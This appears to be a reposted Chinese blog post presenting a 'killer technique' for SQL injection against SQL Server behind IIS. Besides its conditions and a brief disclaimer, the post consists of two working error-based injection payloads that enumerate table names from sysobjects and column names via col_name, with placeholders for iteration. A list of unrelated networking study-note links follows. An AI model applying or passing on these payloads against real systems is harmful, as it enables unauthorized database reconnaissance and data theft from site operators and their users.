博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
SQLSERVER注入必殺技
阅读量:28387 次
发布时间:2019-12-27

本文共 310 字,大约阅读时间需要 1 分钟。

必殺技成功條件:
1.找到注入點
2.數據庫為SQLSERVER
3.IIS沒屏蔽錯誤提示

注:因必殺技是我研究N久的心得,經多次改良,成功率極高。請不要用於不合法用途上,否則後果自負。

[N] = 第N個表

ID=1 and (Select top 1 name from(Select top [N] idname from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名

[N] = 第N個字段
ID=1 and (Select Top 1 col_name(object_id([T])[N]) from sysobjects)>1

转载地址:http://ovtdzu.baihongyu.com/

你可能感兴趣的文章
华为网络设备-访问控制列表配置实验
查看>>
华为网络设备-构建简单IPv6网络实验
查看>>
静态路由实验
查看>>
VMware Workstation 三种网络连接配置详解
查看>>
华为HCIA-datacom 学习笔记1——网络参考模型
查看>>
华为HCIA-datacom 学习笔记2——华为VRP系统
查看>>
华为HCIA-datacom 学习笔记4——IP路由基础
查看>>
华为HCIA-datacom 学习笔记7——VLAN原理与配置
查看>>
华为HCIA-datacom 学习笔记8——生成树
查看>>
华为HCIA-datacom 学习笔记9——网络的可靠性
查看>>
华为HCIA-datacom 学习笔记10——ACL原理与配置
查看>>
华为HCIA-datacom 学习笔记11——AAA原理与配置
查看>>
华为HCIA-datacom 学习笔记12——网络地址转换
查看>>
华为HCIA-datacom 学习笔记13——网络服务与应用
查看>>
RAID0、RAID1、RAID5、RAID6、RAID10、RAID50的异同与应用
查看>>
VMware Workstation Pro 安装教程
查看>>
数据备份、数据快照的异同
查看>>
华为HCIA-datacom 学习笔记14——WLAN概述
查看>>
华为HCIA-datacom 学习笔记16——网络管理与运维
查看>>
华为HCIA-datacom 学习笔记15——广域网技术
查看>>